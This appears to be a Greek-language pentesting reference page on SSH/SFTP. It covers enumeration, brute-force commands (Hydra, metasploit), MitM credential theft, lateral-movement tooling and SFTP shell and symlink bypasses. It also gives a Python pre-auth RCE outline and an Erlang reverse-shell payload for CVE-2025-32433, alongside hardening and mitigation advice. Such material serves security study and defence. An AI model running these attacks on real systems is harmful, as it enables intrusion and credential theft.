22 - Pentesting SSH/SFTP

Reading time: 16 minutes

Basic Information

SSH (Secure Shell ή Secure Socket Shell) είναι ένα πρωτόκολλο δικτύου που επιτρέπει μια ασφαλή σύνδεση σε έναν υπολογιστή μέσω ενός μη ασφαλούς δικτύου. Είναι απαραίτητο για τη διατήρηση της εμπιστευτικότητας και της ακεραιότητας των δεδομένων κατά την πρόσβαση σε απομακρυσμένα συστήματα.

Default port: 22

22/tcp open  ssh     syn-ack

SSH servers:

• openSSH – OpenBSD SSH, που περιλαμβάνεται σε BSD, διανομές Linux και Windows από τα Windows 10
• Dropbear – Υλοποίηση SSH για περιβάλλοντα με χαμηλή μνήμη και πόρους επεξεργαστή, που περιλαμβάνεται στο OpenWrt
• PuTTY – Υλοποίηση SSH για Windows, ο πελάτης χρησιμοποιείται συνήθως αλλά η χρήση του διακομιστή είναι σπανιότερη
• CopSSH – υλοποίηση του OpenSSH για Windows

SSH libraries (implementing server-side):

• libssh – πολυπλατφορμική βιβλιοθήκη C που υλοποιεί το πρωτόκολλο SSHv2 με bindings σε Python, Perl και R; χρησιμοποιείται από το KDE για sftp και από το GitHub για την υποδομή git SSH
• wolfSSH – βιβλιοθήκη διακομιστή SSHv2 γραμμένη σε ANSI C και στοχευμένη για ενσωματωμένα, RTOS και περιβάλλοντα με περιορισμένους πόρους
• Apache MINA SSHD – Η βιβλιοθήκη Apache SSHD java βασίζεται στο Apache MINA
• paramiko – Βιβλιοθήκη πρωτοκόλλου Python SSHv2

Enumeration

Banner Grabbing

nc -vn <IP> 22

Automated ssh-audit

ssh-audit είναι ένα εργαλείο για τον έλεγχο διαμόρφωσης του ssh server & client.

https://github.com/jtesta/ssh-audit είναι ένα ενημερωμένο fork από https://github.com/arthepsy/ssh-audit/

Χαρακτηριστικά:

• Υποστήριξη πρωτοκόλλου SSH1 και SSH2;
• ανάλυση διαμόρφωσης SSH client;
• λήψη banner, αναγνώριση συσκευής ή λογισμικού και λειτουργικού συστήματος, ανίχνευση συμπίεσης;
• συλλογή αλγορίθμων ανταλλαγής κλειδιών, host-key, κρυπτογράφησης και κωδικών αυθεντικοποίησης μηνυμάτων;
• έξοδος πληροφοριών αλγορίθμου (διαθέσιμο από, αφαιρεθεί/απενεργοποιηθεί, μη ασφαλές/αδύναμο/παλαιό, κ.λπ.);
• έξοδος συστάσεων αλγορίθμου (προσθήκη ή αφαίρεση με βάση την αναγνωρισμένη έκδοση λογισμικού);
• έξοδος πληροφοριών ασφαλείας (σχετικά ζητήματα, ανατεθείσα λίστα CVE, κ.λπ.);
• ανάλυση συμβατότητας έκδοσης SSH με βάση τις πληροφορίες αλγορίθμου;
• ιστορικές πληροφορίες από OpenSSH, Dropbear SSH και libssh;
• λειτουργεί σε Linux και Windows;
• χωρίς εξαρτήσεις

usage: ssh-audit.py [-1246pbcnjvlt] <host>

-1,  --ssh1             force ssh version 1 only
-2,  --ssh2             force ssh version 2 only
-4,  --ipv4             enable IPv4 (order of precedence)
-6,  --ipv6             enable IPv6 (order of precedence)
-p,  --port=<port>      port to connect
-b,  --batch            batch output
-c,  --client-audit     starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n,  --no-colors        disable colors
-j,  --json             JSON output
-v,  --verbose          verbose output
-l,  --level=<level>    minimum output level (info|warn|fail)
-t,  --timeout=<secs>   timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>

Δείτε το σε δράση (Asciinema)

Δημόσιο SSH κλειδί του διακομιστή

ssh-keyscan -t rsa <IP> -p <PORT>

Αδύνατοι Κρυπτογραφικοί Αλγόριθμοι

Αυτό ανακαλύπτεται από προεπιλογή από το nmap. Αλλά μπορείτε επίσης να χρησιμοποιήσετε το sslcan ή το sslyze.

Scripts Nmap

nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

• ssh

Brute force usernames, passwords and private keys

Username Enumeration

Σε ορισμένες εκδόσεις του OpenSSH μπορείτε να κάνετε μια επίθεση χρονισμού για να καταμετρήσετε τους χρήστες. Μπορείτε να χρησιμοποιήσετε ένα module του metasploit για να εκμεταλλευτείτε αυτό:

msf> use scanner/ssh/ssh_enumusers

Brute force

Ορισμένα κοινά ssh credentials εδώ και εδώ και παρακάτω.

Private Key Brute Force

Αν γνωρίζετε μερικά ssh private keys που θα μπορούσαν να χρησιμοποιηθούν... ας το δοκιμάσουμε. Μπορείτε να χρησιμοποιήσετε το nmap script:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Ή το MSF auxiliary module:

msf> use scanner/ssh/ssh_identify_pubkeys

Or use ssh-keybrute.py (native python3, lightweight and has legacy algorithms enabled): snowdroppe/ssh-keybrute.

Known badkeys can be found here:

ssh-badkeys/authorized at master \xc2\xb7 rapid7/ssh-badkeys \xc2\xb7 GitHub

Weak SSH keys / Debian predictable PRNG

Ορισμένα συστήματα έχουν γνωστά ελαττώματα στον τυχαίο σπόρο που χρησιμοποιείται για τη δημιουργία κρυπτογραφικού υλικού. Αυτό μπορεί να έχει ως αποτέλεσμα μια δραματικά μειωμένη περιοχή κλειδιών που μπορεί να παραβιαστεί. Προγεννημένα σύνολα κλειδιών που δημιουργήθηκαν σε συστήματα Debian που επηρεάζονται από αδύνατο PRNG είναι διαθέσιμα εδώ: g0tmi1k/debian-ssh.

Πρέπει να κοιτάξετε εδώ για να αναζητήσετε έγκυρα κλειδιά για τη μηχανή του θύματος.

Kerberos

crackmapexec χρησιμοποιώντας το πρωτόκολλο ssh μπορεί να χρησιμοποιήσει την επιλογή --kerberos για να αυθεντικοποιηθεί μέσω kerberos.
Για περισσότερες πληροφορίες εκτελέστε crackmapexec ssh --help.

Default Credentials

SSH-MitM

Εάν βρίσκεστε στο τοπικό δίκτυο ως το θύμα που πρόκειται να συνδεθεί στον SSH server χρησιμοποιώντας όνομα χρήστη και κωδικό πρόσβασης, μπορείτε να προσπαθήσετε να εκτελέσετε μια επίθεση MitM για να κλέψετε αυτά τα διαπιστευτήρια:

Διαδρομή επίθεσης:

• Ανακατεύθυνση κυκλοφορίας: Ο επιτιθέμενος παρακάμπτει την κυκλοφορία του θύματος στη μηχανή του, παρεμβαίνοντας στην προσπάθεια σύνδεσης στον SSH server.
• Παρεμβολή και καταγραφή: Η μηχανή του επιτιθέμενου λειτουργεί ως proxy, καταγράφοντας τα στοιχεία σύνδεσης του χρήστη προσποιούμενη ότι είναι ο νόμιμος SSH server.
• Εκτέλεση εντολών και αναμετάδοση: Τέλος, ο server του επιτιθέμενου καταγράφει τα διαπιστευτήρια του χρήστη, προωθεί τις εντολές στον πραγματικό SSH server, τις εκτελεί και στέλνει τα αποτελέσματα πίσω στον χρήστη, κάνοντάς το διαδικασία να φαίνεται ομαλή και νόμιμη.

SSH MITM κάνει ακριβώς αυτό που περιγράφεται παραπάνω.

Για να καταγράψετε την πραγματική MitM μπορείτε να χρησιμοποιήσετε τεχνικές όπως ARP spoofing, DNS spoofing ή άλλες που περιγράφονται στις Επιθέσεις Δικτύου Spoofing.

SSH-Snake

Εάν θέλετε να διασχίσετε ένα δίκτυο χρησιμοποιώντας ανακαλυφθέντα SSH ιδιωτικά κλειδιά σε συστήματα, χρησιμοποιώντας κάθε ιδιωτικό κλειδί σε κάθε σύστημα για νέους κόμβους, τότε SSH-Snake είναι αυτό που χρειάζεστε.

Το SSH-Snake εκτελεί τις παρακάτω εργασίες αυτόματα και αναδρομικά:

1. Στο τρέχον σύστημα, βρείτε οποιαδήποτε SSH ιδιωτικά κλειδιά,
2. Στο τρέχον σύστημα, βρείτε οποιουσδήποτε κόμβους ή προορισμούς (user@host) που μπορεί να γίνουν αποδεκτοί από τα ιδιωτικά κλειδιά,
3. Προσπαθήστε να SSH σε όλους τους προορισμούς χρησιμοποιώντας όλα τα ανακαλυφθέντα ιδιωτικά κλειδιά,
4. Εάν συνδεθείτε επιτυχώς σε έναν προορισμό, επαναλάβετε τα βήματα #1 - #4 στο συνδεδεμένο σύστημα.

Είναι εντελώς αυτοαναπαραγόμενο και αυτοδιαδιδόμενο -- και εντελώς χωρίς αρχεία.

Config Misconfigurations

Root login

Είναι κοινό για τους SSH servers να επιτρέπουν τη σύνδεση του χρήστη root από προεπιλογή, γεγονός που θέτει σημαντικό κίνδυνο ασφαλείας. Η απενεργοποίηση της σύνδεσης root είναι ένα κρίσιμο βήμα για την ασφάλιση του server. Η μη εξουσιοδοτημένη πρόσβαση με διαχειριστικά δικαιώματα και οι επιθέσεις brute force μπορούν να μετριαστούν κάνοντας αυτή την αλλαγή.

Για να απενεργοποιήσετε τη σύνδεση root στο OpenSSH:

1. Επεξεργαστείτε το αρχείο ρυθμίσεων SSH με: sudoedit /etc/ssh/sshd_config
2. Αλλάξτε την ρύθμιση από #PermitRootLogin yes σε PermitRootLogin no.
3. Επαναφορτώστε τη ρύθμιση χρησιμοποιώντας: sudo systemctl daemon-reload
4. Επανεκκινήστε τον SSH server για να εφαρμοστούν οι αλλαγές: sudo systemctl restart sshd

SFTP Brute Force

• SFTP Brute Force

SFTP command execution

Υπάρχει μια κοινή παράλειψη που συμβαίνει με τις ρυθμίσεις SFTP, όπου οι διαχειριστές σκοπεύουν οι χρήστες να ανταλλάσσουν αρχεία χωρίς να επιτρέπουν την απομακρυσμένη πρόσβαση στο shell. Παρά την ρύθμιση χρηστών με μη διαδραστικά shells (π.χ., /usr/bin/nologin) και περιορίζοντάς τους σε έναν συγκεκριμένο φάκελο, παραμένει ένα κενό ασφαλείας. Οι χρήστες μπορούν να παρακάμψουν αυτούς τους περιορισμούς ζητώντας την εκτέλεση μιας εντολής (όπως /bin/bash) αμέσως μετά την είσοδό τους, πριν αναλάβει το καθορισμένο μη διαδραστικό shell τους. Αυτό επιτρέπει την μη εξουσιοδοτημένη εκτέλεση εντολών, υπονομεύοντας τα προγραμματισμένα μέτρα ασφαλείας.

Example from here:

ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Εδώ είναι ένα παράδειγμα ασφαλούς διαμόρφωσης SFTP (/etc/ssh/sshd_config – openSSH) για τον χρήστη noraj:

Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no

Αυτή η ρύθμιση θα επιτρέπει μόνο SFTP: απενεργοποιώντας την πρόσβαση στο shell αναγκάζοντας την εντολή εκκίνησης και απενεργοποιώντας την πρόσβαση TTY αλλά και απενεργοποιώντας κάθε είδους προώθηση θυρών ή σήραγγες.

SFTP Tunneling

Αν έχετε πρόσβαση σε έναν SFTP server μπορείτε επίσης να σήραγγα την κίνησή σας μέσω αυτού, για παράδειγμα χρησιμοποιώντας την κοινή προώθηση θυρών:

sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

SFTP Symlink

Η sftp έχει την εντολή "symlink". Επομένως, αν έχετε δικαιώματα εγγραφής σε κάποιον φάκελο, μπορείτε να δημιουργήσετε symlinks από άλλους φακέλους/αρχεία. Καθώς πιθανότατα είστε παγιδευμένοι μέσα σε ένα chroot, αυτό δεν θα είναι ιδιαίτερα χρήσιμο για εσάς, αλλά, αν μπορείτε να πρόσβαση στο δημιουργημένο symlink από μια υπηρεσία χωρίς chroot (για παράδειγμα, αν μπορείτε να αποκτήσετε πρόσβαση στο symlink από το διαδίκτυο), θα μπορούσατε να ανοίξετε τα symlinked αρχεία μέσω του διαδικτύου.

Για παράδειγμα, για να δημιουργήσετε ένα symlink από ένα νέο αρχείο "froot" σε "/":

sftp> symlink / froot

Αν μπορείτε να αποκτήσετε πρόσβαση στο αρχείο "froot" μέσω του διαδικτύου, θα μπορείτε να καταγράψετε τον φάκελο ρίζας ("/") του συστήματος.

Μέθοδοι αυθεντικοποίησης

Σε περιβάλλον υψηλής ασφάλειας, είναι κοινή πρακτική να ενεργοποιούνται μόνο οι μέθοδοι αυθεντικοποίησης με κλειδί ή η αυθεντικοποίηση δύο παραγόντων αντί για την απλή αυθεντικοποίηση με κωδικό πρόσβασης. Αλλά συχνά οι ισχυρότερες μέθοδοι αυθεντικοποίησης ενεργοποιούνται χωρίς να απενεργοποιούνται οι ασθενέστερες. Ένας συχνός περίπτωση είναι η ενεργοποίηση του publickey στη διαμόρφωση του openSSH και η ρύθμισή του ως η προεπιλεγμένη μέθοδος, αλλά χωρίς να απενεργοποιείται το password. Έτσι, χρησιμοποιώντας τη λεπτομερή λειτουργία του πελάτη SSH, ένας επιτιθέμενος μπορεί να δει ότι έχει ενεργοποιηθεί μια ασθενέστερη μέθοδος:

ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Για παράδειγμα, αν έχει οριστεί ένα όριο αποτυχιών αυθεντικοποίησης και δεν έχετε ποτέ την ευκαιρία να φτάσετε στη μέθοδο κωδικού πρόσβασης, μπορείτε να χρησιμοποιήσετε την επιλογή PreferredAuthentications για να αναγκάσετε τη χρήση αυτής της μεθόδου.

ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Η ανασκόπηση της διαμόρφωσης του διακομιστή SSH είναι απαραίτητη για να ελέγξετε ότι μόνο οι αναμενόμενες μέθοδοι είναι εξουσιοδοτημένες. Η χρήση της αναλυτικής λειτουργίας στον πελάτη μπορεί να βοηθήσει να δείτε την αποτελεσματικότητα της διαμόρφωσης.

Config files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

• https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
• https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2

Authentication State-Machine Bypass (Pre-Auth RCE)

Πολλές υλοποιήσεις διακομιστή SSH περιέχουν λογικά σφάλματα στην μηχανή καταστάσεων αυθεντικοποίησης που επιτρέπουν σε έναν πελάτη να στείλει μήνυμα πρωτοκόλλου σύνδεσης πριν ολοκληρωθεί η αυθεντικοποίηση. Επειδή ο διακομιστής αποτυγχάνει να επαληθεύσει ότι βρίσκεται στην σωστή κατάσταση, αυτά τα μηνύματα διαχειρίζονται σαν να ήταν ο χρήστης πλήρως αυθεντικοποιημένος, οδηγώντας σε μη αυθεντικοποιημένη εκτέλεση κώδικα ή δημιουργία συνεδρίας.

Σε επίπεδο πρωτοκόλλου, οποιοδήποτε μήνυμα SSH με κωδικό μηνύματος ≥ 80 (0x50) ανήκει στο επίπεδο σύνδεσης (RFC 4254) και πρέπει να γίνεται αποδεκτό μόνο μετά από επιτυχημένη αυθεντικοποίηση (RFC 4252). Εάν ο διακομιστής επεξεργαστεί ένα από αυτά τα μηνύματα ενώ είναι ακόμα στην κατάσταση SSH_AUTHENTICATION, ο επιτιθέμενος μπορεί αμέσως να δημιουργήσει ένα κανάλι και να ζητήσει ενέργειες όπως εκτέλεση εντολών, προώθηση θυρών, κ.λπ.

Generic Exploitation Steps

1. Establish a TCP connection to the target’s SSH port (commonly 22, but other services may expose Erlang/OTP on 2022, 830, 2222…).
2. Craft a raw SSH packet:

• 4-byte packet_length (big-endian)
• 1-byte message_code ≥ 80 (e.g. SSH_MSG_CHANNEL_OPEN = 90, SSH_MSG_CHANNEL_REQUEST = 98)
• Payload that will be understood by the chosen message type

3. Send the packet(s) before completing any authentication step.
4. Interact with the server APIs that are now exposed pre-auth (command execution, port forwarding, file-system access, …).

Python proof-of-concept outline:

import socket, struct
HOST, PORT = '10.10.10.10', 22
s = socket.create_connection((HOST, PORT))
# skip version exchange for brevity – send your own client banner then read server banner
# … key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# Packet: len(1)=1, SSH_MSG_CHANNEL_OPEN (90)
pkt  = struct.pack('>I', 1) + b'\x5a'  # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands

Στην πράξη, θα χρειαστεί να εκτελέσετε (ή να παραλείψετε) την ανταλλαγή κλειδιών σύμφωνα με την υλοποίηση του στόχου, αλλά δεν εκτελείται ποτέ καμία αυθεντικοποίηση.

Erlang/OTP sshd (CVE-2025-32433)

• Επηρεαζόμενες εκδόσεις: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
• Αιτία: ο εγγενής SSH daemon του Erlang δεν επικυρώνει την τρέχουσα κατάσταση πριν καλέσει το ssh_connection:handle_msg/2. Επομένως, οποιοδήποτε πακέτο με κωδικό μηνύματος 80-255 φτάνει στον χειριστή σύνδεσης ενώ η συνεδρία είναι ακόμα στην κατάσταση userauth.
• Επίπτωση: μη αυθεντικοποιημένη εκτέλεση απομακρυσμένου κώδικα (ο daemon συνήθως εκτελείται ως root σε ενσωματωμένες/OT συσκευές).

Παράδειγμα payload που δημιουργεί ένα reverse shell δεμένο με το κανάλι που ελέγχεται από τον επιτιθέμενο:

% open a channel first … then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").

Blind RCE / out-of-band detection μπορεί να πραγματοποιηθεί μέσω DNS:

execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession

Detection & Mitigation:

• Εξετάστε την κίνηση SSH: απορρίψτε οποιοδήποτε πακέτο με κωδικό μηνύματος ≥ 80 που παρατηρείται πριν από την αυθεντικοποίηση.
• Αναβαθμίστε το Erlang/OTP σε 27.3.3 / 26.2.5.11 / 25.3.2.20 ή νεότερη έκδοση.
• Περιορίστε την έκθεση των θυρών διαχείρισης (22/2022/830/2222) – ειδικά σε εξοπλισμό OT.

Other Implementations Affected

• libssh 0.6 – 0.8 (server side) – CVE-2018-10933 – δέχεται ένα μη αυθεντικοποιημένο SSH_MSG_USERAUTH_SUCCESS που αποστέλλεται από τον πελάτη, αποτελεσματικά το αντίστροφο λογικό σφάλμα.

Το κοινό μάθημα είναι ότι οποιαδήποτε παρέκκλιση από τις μεταβάσεις κατάστασης που ορίζονται από το RFC μπορεί να είναι μοιραία. Όταν αναθεωρείτε ή fuzzing SSH daemons, δώστε ιδιαίτερη προσοχή στην επιβολή μηχανής κατάστασης.

References

• Unit 42 – Erlang/OTP SSH CVE-2025-32433
• SSH hardening guides
• Turgensec SSH hacking guide

HackTricks Automatic Commands

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'